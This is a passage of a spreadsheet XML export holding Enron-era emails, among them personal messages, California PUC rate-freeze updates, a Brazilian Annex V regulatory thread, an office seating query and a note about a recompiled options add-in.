$118 roundtrip! Can you freakin' believe it? Anyway, you have to purchase and _x000D_
use the ticket by the end of March, so I was thinking a little spring break _x000D_
action was called for. Do you think you'd be settled enough by the end of _x000D_
March to accomodate a portly older sister for a few days? Let me know, and _x000D_
I'll do the deal._x000D_
_x000D_
Got to go - business abounds at Enron as usual. I'll try to drop you a line _x000D_
tonight when I have more time to write. Do you have a phone number? Amber was _x000D_
in Denver over the weekend, and she and Monica called me trying to get ahold _x000D_
of you, but I had no idea where to look. (Except somewhere in Denver, but _x000D_
from what I've heard it's a fairly big place.)_x000D_
_x000D_
Write back soon, or call - I want to know how the internship is. But more _x000D_
importantly, how's the unlimited Starbucks coffee?_x000D_
_x000D_
Love,_x000D_
Kate</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 10:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scott.stoness@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Re TURN wants to end AB1890 Feb 1._x000D_
_x000D_
This hurts us because we would not get Px credit for SCE for the month of _x000D_
February._x000D_
_x000D_
Furthermore, I am not sure that it does not hurt TURN because:_x000D_
Existing settlements would have a large part of the savings related to _x000D_
nuclear going to the shareholder if AB1890 does not end._x000D_
Similar issues related to existing coal units_x000D_
10% of the benefits of hydro go to utilities._x000D_
_x000D_
In addition we should argue that:_x000D_
Ending AB1890, before the valuation of existing generation is contrary to law._x000D_
Retroactive rate making is contrary to law._x000D_
_x000D_
Scott_x000D_
_x000D_
_x000D_
From: Jeff Dasovich@ENRON on 02/12/2001 01:23 PM_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: Alan Comnes/PDX/ECT@ECT, Angela Schwarz/HOU/EES@EES, Beverly _x000D_
Aden/HOU/EES@EES, Bill Votaw/HOU/EES@EES, Brenda Barreda/HOU/EES@EES, Carol _x000D_
Moffett/HOU/EES@EES, Cathy Corbin/HOU/EES@EES, Chris H Foster/HOU/ECT@ECT, _x000D_
Christina Liscano/HOU/EES@EES, Christopher F Calger/PDX/ECT@ECT, Craig H _x000D_
Sutter/HOU/EES@EES, Dan Leff/HOU/EES@EES, Debora Whitehead/HOU/EES@EES, _x000D_
Dennis Benevides/HOU/EES@EES, Don Black/HOU/EES@EES, Dorothy _x000D_
Youngblood/HOU/ECT@ECT, Douglas Huth/HOU/EES@EES, Edward _x000D_
Sacks/Corp/Enron@ENRON, Eric Melvin/HOU/EES@EES, Erika Dupre/HOU/EES@EES, _x000D_
Evan Hughes/HOU/EES@EES, Fran Deltoro/HOU/EES@EES, Frank W _x000D_
Vickers/HOU/ECT@ECT, Gayle W Muench/HOU/EES@EES, Ginger _x000D_
Dernehl/NA/Enron@ENRON, Gordon Savage/HOU/EES@EES, Harold G _x000D_
Buchanan/HOU/EES@EES, Harry Kingerski/NA/Enron@ENRON, Iris Waser/HOU/EES@EES, _x000D_
James D Steffes/NA/Enron@ENRON, James W Lewis/HOU/EES@EES, James _x000D_
Wright/Western Region/The Bentley Company@Exchange, Jeff Messina/HOU/EES@EES, _x000D_
Jeremy Blachman/HOU/EES@EES, Jess Hewitt/HOU/EES@EES, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Kathy _x000D_
Bass/HOU/EES@EES, Kathy Dodgen/HOU/EES@EES, Ken Gustafson/HOU/EES@EES, Kevin _x000D_
Hughes/HOU/EES@EES, Leasa Lopez/HOU/EES@EES, Leticia Botello/HOU/EES@EES, _x000D_
Mark S Muller/HOU/EES@EES, Marsha Suggs/HOU/EES@EES, Marty Sunde/HOU/EES@EES, _x000D_
Meredith M Eggleston/HOU/EES@EES, Michael Etringer/HOU/ECT@ECT, Michael _x000D_
Mann/HOU/EES@EES, Michelle D Cisneros/HOU/ECT@ECT, mpalmer@enron.com, Neil _x000D_
Bresnan/HOU/EES@EES, Neil Hong/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Paula _x000D_
Warren/HOU/EES@EES, Richard L Zdunkewicz/HOU/EES@EES, Richard _x000D_
Leibert/HOU/EES@EES, Richard Shapiro/NA/Enron@ENRON, Rita _x000D_
Hennessy/NA/Enron@ENRON, Robert Badeer/HOU/ECT@ECT, Roger Yang/SFO/EES@EES, _x000D_
Rosalinda Tijerina/HOU/EES@EES, Sandra McCubbin/NA/Enron@ENRON, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Scott Gahn/HOU/EES@EES, Scott Stoness/HOU/EES@EES, _x000D_
Sharon Dick/HOU/EES@EES, skean@enron.com, Susan J Mara/NA/Enron@ENRON, Tanya _x000D_
Leslie/HOU/EES@EES, Tasha Lair/HOU/EES@EES, Ted Murphy/HOU/ECT@ECT, Terri _x000D_
Greenlee/NA/Enron@ENRON, Tim Belden/HOU/ECT@ECT, Tony Spruiell/HOU/EES@EES, _x000D_
Vicki Sharp/HOU/EES@EES, Vladimir Gorny/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES, _x000D_
William S Bradford/HOU/ECT@ECT, Kathryn Corbally/Corp/Enron@ENRON, Jubran _x000D_
Whalan/HOU/EES@EES, triley@enron.com, Richard B Sanders/HOU/ECT@ECT, Robert C _x000D_
Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Greg Wolfe/HOU/ECT@ECT, James _x000D_
Wright/Western Region/The Bentley Company@Exchange, Dirk vanUlden/Western _x000D_
Region/The Bentley Company@Exchange, Steve Walker/SFO/EES@EES, Jennifer _x000D_
Rudolph/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: _x000D_
Quick Update_x000D_
_x000D_
On the various matters currently before the California PUC:_x000D_
The Commission order stating that the utilities should absorb any difference _x000D_
between DWR's cost of power and the retail rate freeze is still technically _x000D_
in effect.  (The order only applies, however, to the power purchased under _x000D_
the Governor's emergency order giving the State the authority to buy power.)_x000D_
The utilities have petitioned to modify the decision telling the Commission _x000D_
that the easiest way to remedy the problem would be to vacate the order _x000D_
altogether, but if the Commission didn't want to vacate the order, it would _x000D_
need to change the decision so that the IOUs don't eat any shortfalls._x000D_
The Commission can act on the petition to modify whenever it chooses.  In _x000D_
addition, it has a continuation meeting scheduled for this Thursday and a _x000D_
regularly scheduled business meeting next week.  So the opportunity to act _x000D_
and fix the Order is there if the Commission wants to take it._x000D_
With respect to the cost of utility generation (i.e., retained generating _x000D_
assets and QF contracts), the Commission has a set up a schedule that _x000D_
foresses a Commission decision adopting an "interim" procurement charge on _x000D_
March 27th.  There is another "workshop" scheduled for tomorrow to discuss _x000D_
the utilities' proposals, after which the utilities will be required to file _x000D_
formal "advice  letters" with the Commission.  Those advice letters will form _x000D_
the basis of the process that the Commission will use to ultimately arrive at _x000D_
a decision on the 27th._x000D_
Everyone participating in the workshops takes the view that  customers will _x000D_
see a separate line item on their bills to cover the going forward costs that _x000D_
DWR incurs to buy power.  Everyone participating in the workshops also takes _x000D_
the view that customers will be on the hook for DWR's costs and the _x000D_
Commission will, if necessary, raise rates to ensure that DWR is made whole.  _x000D_
(Unfortunately, the Commission is not currently sending signals to show that _x000D_
it concurs with the folks participating in the workshops.  And until there is _x000D_
clarity on whether the Commission will agree to "pass through" those costs, _x000D_
Enron and others will continue to have problems with DWR's credit as it _x000D_
applies to the RFP that we and others responded to last week.)_x000D_
Next week begins the hearings to address the issues that Commission started _x000D_
to examine began in the emergency hearings held over the holidays, i.e., the _x000D_
utilities financial position, TURN's proposal to "net out" the utilitities' _x000D_
generation-related revenues with the undercollection caused by the rate cap, _x000D_
the date on which the rate has (or will) end, etc.    Recently, TURN modified _x000D_
its testimony in response to the passage of AB1X.  TURN's new position is _x000D_
that the Commission should find that the rate freeze ended on February 1st, _x000D_
the effective date of AB1X.   EES will need to quickly determine how and if _x000D_
it wants to respond to TURN's latest stance on the end of the rate freeze._x000D_
We continue to try to persuade stakeholders and the Commission that DA _x000D_
customers must be compensated for the fact that they paid for the utilities' _x000D_
stranded generating assets.  That compensation could come in one of two _x000D_
forms:  1) access to a proportionate share of the utilities' retained, _x000D_
cost-based generating assets, or 2) a credit representing the difference _x000D_
between the "market" value of the retained generating assets and the book _x000D_
value of those assets.  We are not getting much traction thus far._x000D_
The Commission is scheduled to issue a separate decision addressing the rate _x000D_
freeze issue, the issue of whether to net out generating-related revenues _x000D_
against the undercollection, etc. on March 27.  So both sets of issues (the _x000D_
procurement charges and the "end of the rate freeze) are scheduled to be _x000D_
"finalized" on March 27, albeit in separate orders._x000D_
With respect to the Block Foward issue, our lawyers had a pretty good meeting _x000D_
on Friday with the DWR general counsel and other DWR lawyers.  However, it _x000D_
has become clear that despite those efforts, FERC's decision on "charge _x000D_
backs" will have a significant effect on the resolution of the Block Forward _x000D_
issue._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 09:41:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>yeah_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Erin Richardson &lt;erichardson@sarofim.com&gt;@ENRON [mailto:IMCEANOTES-Erin+20Richardson+20+3Cerichardson+40sarofim+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Friday, October 05, 2001 11:12 AM_x000D_
To:	Lenhart, Matthew_x000D_
Subject:	RE:_x000D_
_x000D_
sounds exciting.  want to go to dinner with me before you have your 'matt_x000D_
time'?_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matthew.Lenhart@enron.com [mailto:Matthew.Lenhart@enron.com]_x000D_
Sent: Friday, October 05, 2001 10:45 AM_x000D_
To: erichardson@sarofim.com_x000D_
Subject: RE:_x000D_
_x000D_
_x000D_
probablyl gonna just kick it_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   Erin Richardson &lt;erichardson@sarofim.com&gt;@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-Erin+20Richardson+20+3Cerichardson+40sarofim+2Ecom+3E+40E_x000D_
NRON@ENRON.com]_x000D_
_x000D_
_x000D_
   Sent:   Friday, October 05, 2001 10:41 AM_x000D_
   To:     Lenhart, Matthew_x000D_
   Subject:  RE:_x000D_
_x000D_
   i haven't thought about it yet.  what are you doing_x000D_
_x000D_
   -----Original Message-----_x000D_
   From: Matthew.Lenhart@enron.com [mailto:Matthew.Lenhart@enron.com]_x000D_
   Sent: Friday, October 05, 2001 10:30 AM_x000D_
   To: erichardson@sarofim.com_x000D_
   Subject: RE:_x000D_
_x000D_
_x000D_
   you know, whatever.  i will let you know later.  what are you doing_x000D_
   tonight._x000D_
_x000D_
       -----Original Message-----_x000D_
      From:   Erin Richardson &lt;erichardson@sarofim.com&gt;@ENRON_x000D_
_x000D_
_x000D_
[mailto:IMCEANOTES-Erin+20Richardson+20+3Cerichardson+40sarofim+2Ecom+3E+40E_x000D_
   NRON@ENRON.com]_x000D_
_x000D_
_x000D_
      Sent:   Friday, October 05, 2001 9:57 AM_x000D_
      To:     Lenhart, Matthew_x000D_
      Subject:  RE:_x000D_
_x000D_
      like what?_x000D_
_x000D_
      -----Original Message-----_x000D_
      From: Matthew.Lenhart@enron.com [mailto:Matthew.Lenhart@enron.com]_x000D_
      Sent: Friday, October 05, 2001 9:51 AM_x000D_
      To: erichardson@sarofim.com_x000D_
      Subject: RE:_x000D_
_x000D_
_x000D_
      i can think of a few things_x000D_
_x000D_
          -----Original Message-----_x000D_
         From:   Erin Richardson &lt;erichardson@sarofim.com&gt;@ENRON_x000D_
_x000D_
_x000D_
_x000D_
[mailto:IMCEANOTES-Erin+20Richardson+20+3Cerichardson+40sarofim+2Ecom+3E+40E_x000D_
      NRON@ENRON.com]_x000D_
_x000D_
_x000D_
         Sent:   Friday, October 05, 2001 9:47 AM_x000D_
         To:     Lenhart, Matthew_x000D_
         Subject:  RE:_x000D_
_x000D_
         i was just kidding.  i am very sweet.  i feel terrible that you_x000D_
      didn't_x000D_
         sleep_x000D_
         well. if there was anything i could do to make you feel better i_x000D_
      would._x000D_
_x000D_
         -----Original Message-----_x000D_
         From: Matthew.Lenhart@enron.com [mailto:Matthew.Lenhart@enron.com]_x000D_
         Sent: Friday, October 05, 2001 9:47 AM_x000D_
         To: erichardson@sarofim.com_x000D_
         Subject: RE:_x000D_
_x000D_
_x000D_
         real sweet.  you have a stone heart._x000D_
_x000D_
             -----Original Message-----_x000D_
            From:   Erin Richardson &lt;erichardson@sarofim.com&gt;@ENRON_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[mailto:IMCEANOTES-Erin+20Richardson+20+3Cerichardson+40sarofim+2Ecom+3E+40E_x000D_
         NRON@ENRON.com]_x000D_
_x000D_
_x000D_
            Sent:   Friday, October 05, 2001 9:38 AM_x000D_
            To:     Lenhart, Matthew_x000D_
            Subject:  RE:_x000D_
_x000D_
            of course you don't.  you just dream up these things so i will_x000D_
      feel_x000D_
            sorry_x000D_
            for you, i don't.  you slept fine._x000D_
_x000D_
            -----Original Message-----_x000D_
            From: Matthew.Lenhart@enron.com_x000D_
   [mailto:Matthew.Lenhart@enron.com]_x000D_
            Sent: Friday, October 05, 2001 9:10 AM_x000D_
            To: erichardson@sarofim.com_x000D_
            Subject: RE:_x000D_
_x000D_
_x000D_
            um, i don't remember that._x000D_
_x000D_
                -----Original Message-----_x000D_
               From:   Erin Richardson &lt;erichardson@sarofim.com&gt;@ENRON_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[mailto:IMCEANOTES-Erin+20Richardson+20+3Cerichardson+40sarofim+2Ecom+3E+40E_x000D_
            NRON@ENRON.com]_x000D_
_x000D_
_x000D_
               Sent:   Friday, October 05, 2001 9:00 AM_x000D_
               To:     Lenhart, Matthew_x000D_
               Subject:  RE:_x000D_
_x000D_
               that's your fault.  you were taking up over half of the bed,_x000D_
   i_x000D_
      had_x000D_
         to_x000D_
               ask_x000D_
               you to move over.  and then you kept coughing in the middle_x000D_
   of_x000D_
      the_x000D_
            night_x000D_
               and_x000D_
               waking me up. so, i did not sleep well. you probably slept_x000D_
      better_x000D_
            than_x000D_
               me, i_x000D_
               don't know what you're complaining about._x000D_
_x000D_
               -----Original Message-----_x000D_
               From: Matthew.Lenhart@enron.com_x000D_
      [mailto:Matthew.Lenhart@enron.com]_x000D_
               Sent: Friday, October 05, 2001 8:53 AM_x000D_
               To: erichardson@sarofim.com_x000D_
               Subject: RE:_x000D_
_x000D_
_x000D_
               i am tired b/c i kept waking up with no covers and my butt_x000D_
   was_x000D_
            hanging_x000D_
               off_x000D_
               the bed. i looked at you and you were covered up to your_x000D_
   neck_x000D_
      with_x000D_
            the_x000D_
               covers in the middle of the bed.  you look like you slept_x000D_
   well._x000D_
_x000D_
                   -----Original Message-----_x000D_
                  From:   Erin Richardson &lt;erichardson@sarofim.com&gt;@ENRON_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[mailto:IMCEANOTES-Erin+20Richardson+20+3Cerichardson+40sarofim+2Ecom+3E+40E_x000D_
               NRON@ENRON.com]_x000D_
_x000D_
_x000D_
                  Sent:   Friday, October 05, 2001 8:45 AM_x000D_
                  To:     Lenhart, Matthew_x000D_
                  Subject:  RE:_x000D_
_x000D_
                  i know, me too.  but isn't she so cute?  i love her,_x000D_
   she's_x000D_
      the_x000D_
            best._x000D_
_x000D_
                  -----Original Message-----_x000D_
                  From: Lenhart, Matthew [mailto:Matthew.Lenhart@ENRON.com]_x000D_
                  Sent: Friday, October 05, 2001 8:12 AM_x000D_
                  To: erichardson@sarofim.com_x000D_
                  Subject:_x000D_
_x000D_
_x000D_
                  i am tired.  your dog kept me up all night._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   **********************************************************************_x000D_
                  This e-mail is the property of Enron Corp. and/or its_x000D_
      relevant_x000D_
               affiliate_x000D_
                  and_x000D_
                  may contain confidential and privileged material for the_x000D_
      sole_x000D_
         use_x000D_
            of_x000D_
               the_x000D_
                  intended recipient (s). Any review, use, distribution or_x000D_
            disclosure_x000D_
               by_x000D_
                  others is strictly prohibited. If you are not the_x000D_
   intended_x000D_
            recipient_x000D_
               (or_x000D_
                  authorized to receive for the recipient), please contact_x000D_
   the_x000D_
            sender_x000D_
               or_x000D_
                  reply_x000D_
                  to Enron Corp. at_x000D_
   enron.messaging.administration@enron.com_x000D_
      and_x000D_
            delete_x000D_
                  all_x000D_
                  copies of the message. This e-mail (and any attachments_x000D_
      hereto)_x000D_
            are_x000D_
               not_x000D_
                  intended to be an offer (or an acceptance) and do not_x000D_
   create_x000D_
      or_x000D_
               evidence_x000D_
                  a_x000D_
                  binding and enforceable contract between Enron Corp. (or_x000D_
   any_x000D_
      of_x000D_
            its_x000D_
                  affiliates) and the intended recipient or any other_x000D_
   party,_x000D_
      and_x000D_
         may_x000D_
               not_x000D_
                  be_x000D_
                  relied on by anyone as the basis of a contract by_x000D_
   estoppel_x000D_
      or_x000D_
               otherwise._x000D_
                  Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   **********************************************************************</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 15:48:46 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'w..white@enron.com', 'c..gossett@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>RE: Seating Question</t>
  </si>
  <si>
    <t>Attached is the latest update for the 6th floor.   Hope this looks as you expected._x000D_
_x000D_
Regards,_x000D_
Tammy_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	White, Stacey W.  _x000D_
Sent:	Wednesday, January 30, 2002 2:53 PM_x000D_
To:	Shepperd, Tammy R._x000D_
Cc:	Hennessy, Sonia; Gossett, Jeffrey C._x000D_
Subject:	Seating Question_x000D_
_x000D_
I just heard a rumor that the Ercot Power Trading was going to sit in the Gas (Open) section.  Is this the case and does it change the seating for gas and power risk?_x000D_
_x000D_
Thanks,_x000D_
Stacey</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 04:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Generators want to kill Annex V</t>
  </si>
  <si>
    <t xml:space="preserve">Just for your information_x000D_
_x000D_
Again, one issue which is key for Enron.  In my view, It took too much time=_x000D_
=20_x000D_
for us to put a stick on the ground. Back in April, Regulatory Affairs=20_x000D_
identified all the riks, opportunities and key success factors one should=_x000D_
=20_x000D_
face in the rationing.  Now distributors have [finally] agreed that Annex V=_x000D_
=20_x000D_
is key. The Government proposal to kill Annex V is obscene.=20_x000D_
_x000D_
LM_x000D_
---------------------- Forwarded by Luiz Maurer/SA/Enron on 05/23/2001 11:3=_x000D_
7=20_x000D_
AM ---------------------------_x000D_
_x000D_
=09Debora Klinger_x000D_
=0905/22/2001 07:06 PM_x000D_
=09_x000D_
To: Luiz Maurer/SA/Enron@Enron_x000D_
cc: =20_x000D_
_x000D_
Subject: Re: Generators want to kill Annex V_x000D_
_x000D_
Maurer,_x000D_
_x000D_
O primeiro t?pico abaixo foi em sua homenagem!!_x000D_
A prop?sito, vi Voc ontem no Jornal Nacional, ao lado do Pedro Parente.....=_x000D_
??Abra?os??---------------------- Forwarded by Debora Klinger/SA/Enron on 0=_x000D_
5/22/2001 ?07:11 PM ---------------------------??=09Debora Klinger?=0905/22=_x000D_
/2001 07:45 PM?=09?To: Sergio Assad/SA/Enron@Enron?cc: Orlando Gonzalez/SA/=_x000D_
Enron@Enron, Luiz Maurer/SA/Enron@Enron, Fred ?Sampaio/SA/Enron@Enron, Joao=_x000D_
 Carlos Albuquerque/SA/Enron@Enron, Joe ?Kishkill/SA/Enron@Enron, Jose Best=_x000D_
ard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT ??Subject: Re: Generators want to k=_x000D_
ill Annex V  ??I just attended to the Fiscal-Legal Seminar promoted by ABCE=_x000D_
. The first topic ?presented by ABCE=01,s President by the opening of the S=_x000D_
eminar was the ?importance of the maintenance of the Annex V of the Initial=_x000D_
 Contracts.  ??Among other matters, it was discussed during the event the C=_x000D_
oncession ?Contract and Rationing. Prof. Caio T?cito (one of the most well =_x000D_
known and ?respected scholars) was one of the speakers. According with him,=_x000D_
 the losses ?in sales and revenues that the D/Cs will suffer as a result of=_x000D_
 the cut of the ?load may be recovered by D/Cs based on the principle of th=_x000D_
e re-establishment ?of the economic-financial balancing ("equilibrium") of =_x000D_
the concession ?agreement. Prof. T?cito further emphasized his belief that =_x000D_
the surcharge ?("sobretarifa") sum that is to be collected should be reserv=_x000D_
ed in favor of ?the D/Cs, so as to compensate partially such losses. Finall=_x000D_
y, Mr. T?cito ?suggested that in order to avoid legal controversies, the Go=_x000D_
vernment could, ?alternatively, conceive using the surcharge ("sobretarifa"=_x000D_
) collected as ?future credits to be used by consumers when rationing is ov=_x000D_
er.??David Watenberg also ratified such understanding. He further expressed=_x000D_
 his ?belief that the surcharge ("sobretarifa") has no legal grounds to sur=_x000D_
vive. ?This is so, because according to Paragraph One, Article 6 of the Con=_x000D_
cession ?Law (Law n. 8987/95) every concession shall render adequate servic=_x000D_
es, ?meaning, among other things, the moderation of the tariffs.??Regards,?=_x000D_
D,bora??????Sergio Assad?05/20/2001 11:53 AM?To: Orlando Gonzalez/SA/Enron?=_x000D_
cc: luiz maurer, debora klinger, sergio.assad@enron.com, Luiz ?Maurer/SA/En=_x000D_
ron@Enron, Fred Sampaio/SA/Enron@Enron, Joao Carlos ?Albuquerque/SA/Enron@E=_x000D_
nron, Joe Kishkill/SA/Enron@Enron, Jose ?Bestard/ENRON_DEVELOPMENT@ENRON_DE=_x000D_
VELOPMENT ??Subject: Re: Generators want to kill Annex V  ??Orlando??Acho d=_x000D_
esnecess?rio o conference uma vez que a Debora est? corret?ssima no que ?di=_x000D_
z rspeito a impossibilidade da ANEEL intervir no anexoV.  Al,m da D,bora, ?=_x000D_
falei com Jos, Em?lio, David Waltenberg e Alo?sio Miranda (Ulhoa Canto) e ?=_x000D_
todos tm a mesma opini?o, ou seja: somente uma lei (ou medida provis?ria) =_x000D_
=20_x000D_
pode alterar o contrato inicial.=20_x000D_
_x000D_
O exemplo mais claro dessa possibilidade de intervens?o foi a lei do plano=_x000D_
=20_x000D_
Real que alterou todos os contratos administrativos._x000D_
Quanto . posi??o ENRON, temos unanimidade quanto a cren?a de se respeitar o=_x000D_
s=20_x000D_
contratos. Estamos executando um forte  advocacy nessa linha._x000D_
Sergio Assad=20_x000D_
Sergio Assad_x000D_
_x000D_
_x000D_
_x000D_
Orlando Gonzalez_x000D_
05/19/2001 09:32 AM_x000D_
To: sergio.assad@enron.com_x000D_
cc: Luiz Maurer/SA/Enron@Enron, Fred Sampaio/SA/Enron@Enron, Joao Carlos=20_x000D_
Albuquerque/SA/Enron@Enron, Joe Kishkill/SA/Enron@Enron, Jose=20_x000D_
Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT=20_x000D_
_x000D_
Subject: Re: Generators want to kill Annex V =20_x000D_
_x000D_
After today's round of meetings please schedule a  call  tomorrow to review=_x000D_
=20_x000D_
Enron's position on  all these points.  Sergio Please coordinate and ask=20_x000D_
Cristina to set up.  I suggest mid morning on Sunday so we have time to=20_x000D_
adjust.  I do not want to defend two or three points of view on the same=20_x000D_
subject as Enron._x000D_
_x000D_
_x000D_
_x000D_
Luiz Maurer_x000D_
18/05/2001 22:21_x000D_
To: Debora Klinger/SA/Enron@Enron_x000D_
cc: Sergio Assad/SA/Enron@Enron, Fred Sampaio/SA/Enron@Enron, Joao Carlos=_x000D_
=20_x000D_
Albuquerque/SA/Enron@Enron, Orlando Gonzalez/SA/Enron@Enron, Joe=20_x000D_
Kishkill/SA/Enron@Enron, Jose Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT=_x000D_
=20_x000D_
_x000D_
Subject: Re: Generators want to kill Annex V =20_x000D_
_x000D_
Debora_x000D_
_x000D_
Good points._x000D_
_x000D_
Economic Equilibrium. You are right. We can claim it. However, it may be=20_x000D_
virtually impossible to claim the opportunity cost of a foregone long=20_x000D_
position. I would not take this risk._x000D_
_x000D_
Your statement that ANEEL has no power to change Annex V makes me feel more=_x000D_
=20_x000D_
confortable. It makes me believe that the right way of approaching the issu=_x000D_
e=20_x000D_
is to prepare a position paper on Monday and to deliver/explain it directly=_x000D_
=20_x000D_
to Minister Pedro Parente. No need to spend time on consensus building on=_x000D_
=20_x000D_
issues which are "zero sum game" by nature (two years of COEX have taught m=_x000D_
e=20_x000D_
this lesson).  Let's preempt the issue by being  faster and smarter.=20_x000D_
_x000D_
LM_x000D_
_x000D_
_x000D_
_x000D_
=09Debora Klinger_x000D_
=0905/18/2001 09:46 PM_x000D_
=09_x000D_
To: Luiz Maurer/SA/Enron@Enron_x000D_
cc: Sergio Assad/SA/Enron@Enron, Fred Sampaio/SA/Enron@Enron, Joao Carlos=_x000D_
=20_x000D_
Albuquerque/SA/Enron@Enron, Orlando Gonzalez/SA/Enron@Enron, Joe=20_x000D_
Kishkill/SA/Enron@Enron, Jose Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT=_x000D_
=20_x000D_
_x000D_
Subject: Re: Generators want to kill Annex V =20_x000D_
_x000D_
Maurer,_x000D_
_x000D_
This is a very important issue. Although in case of loss to Elektro, we wou=_x000D_
ld=20_x000D_
always be eligible to claim for the reestablishment of the economic-financi=_x000D_
al=20_x000D_
balancing of the concession agreements, we would be, with no doubt, in a=20_x000D_
better position in case we can maintain the Annex V._x000D_
_x000D_
Regarding the ANNEL sympathy towards generator=01,s pressure, I don't belie=_x000D_
ve=20_x000D_
ANEEL has the authority to interfere in a duly executed agreement, as it is=_x000D_
 a=20_x000D_
perfect legal act ("ato jur?dico perfeito"). Only the Union is competent to=_x000D_
=20_x000D_
intervene in such acts, based on the public interest and the social well=20_x000D_
being._x000D_
_x000D_
I will work hard on the analysis of the matter and come back with further=_x000D_
=20_x000D_
comments._x000D_
_x000D_
Thanks,_x000D_
D,bora_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Luiz Maurer_x000D_
05/18/2001 09:02 PM_x000D_
To: Sergio Assad/SA/Enron@Enron, Fred Sampaio/SA/Enron@Enron, Joao Carlos=_x000D_
=20_x000D_
Albuquerque/SA/Enron@Enron_x000D_
cc: Orlando Gonzalez/SA/Enron@Enron, Joe Kishkill/SA/Enron@Enron, Jose=20_x000D_
Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Debora Klinger/SA/Enron@Enron=_x000D_
=20_x000D_
_x000D_
Subject: Generators want to kill Annex V_x000D_
_x000D_
The rumor mill says that generators want to revoke Annex V. No surprise. Th=_x000D_
e=20_x000D_
bad news is that it seems that Aneel likes the idea._x000D_
_x000D_
This may represent a US$ 60 million loss to Elektro, only in 2001.=20_x000D_
_x000D_
Distribution companies are [aparently] against this measure. However, D/Cs =_x000D_
is=20_x000D_
short position will [likely] applaud the idea (to avoid costly exposures in=_x000D_
=20_x000D_
the MAE)_x000D_
_x000D_
An Abradee group was created to think about the issue. Joao and Fred will=_x000D_
=20_x000D_
participate tomorrow._x000D_
_x000D_
A few supporting arguments._x000D_
_x000D_
1) Contract sanctity. Why changing the rules in the middle of the game if=_x000D_
=20_x000D_
Annex V was designed specifically to deal with rationing conditions?=20_x000D_
_x000D_
2) More subtle argument. The risk of  being exposed is the only economic=20_x000D_
incentive  for a D/C to reduce its load. Otherwise, we will have a classica=_x000D_
l=20_x000D_
"free ride" problem: D/Cs will not put any effort to reduce their=20_x000D_
loads/revenues and will advocate for an ex-post adjustment on ICs based on=_x000D_
=20_x000D_
verified load reduction. We can build a case that in the absence of this=20_x000D_
exposure, D/Cs will have no incentives to work hand in hand with their=20_x000D_
clients to foster load reduction and the whole program will fail._x000D_
_x000D_
Debora is working on the legal aspects of Annex V, taking into account the=_x000D_
=20_x000D_
new MP. Sergio has talked to a few lawyers to get their views/written=20_x000D_
opinions._x000D_
_x000D_
What about writing a letter to Pedro Parente as Enron, exploring those issu=_x000D_
es=20_x000D_
and explaining why Annex V is so important to the success of the whole=20_x000D_
program? (the free ride issue)_x000D_
_x000D_
LM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 03:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>put on collar</t>
  </si>
  <si>
    <t xml:space="preserve">I re-compiled Exotica.xll, so that the xcol function is a put on collar._x000D_
_x000D_
De-add in your Exotica. Add this special one. And use xcol for put._x000D_
_x000D_
Then delete the Exotica_xcol_putoncollar.xll_x000D_
_x000D_
We will build in this functionality in near future._x000D_
_x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
Paulo,_x000D_
_x000D_
Can you add a flag to xcol function so that we can choose a put or call from _x000D_
the_x000D_
spreadsheet ?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Zimin_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 04:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: -kai-</t>
  </si>
  <si>
    <t>Sherri,_x000D_
One more try at sending you Elvis' invitation(attached).  Let me know if_x000D_
it won't open and I will send you the details and directions._x000D_
_x000D_
Other info. will be forthcoming as it is firmed up._x000D_
_x000D_
-kai-_x000D_
Beek_x000D_
_x000D_
Fred Haulenbeek_x000D_
1195 Baldwin Road_x000D_
Hinesburg, Vermont     05461_x000D_
802 482-4043     802 482-6319</t>
  </si>
  <si>
    <t>Mon, 11 Feb 2002 01:04:56 -0800 (PST)</t>
  </si>
  <si>
    <t>Power Markets 2002  April 17-18, Las Vegas</t>
  </si>
  <si>
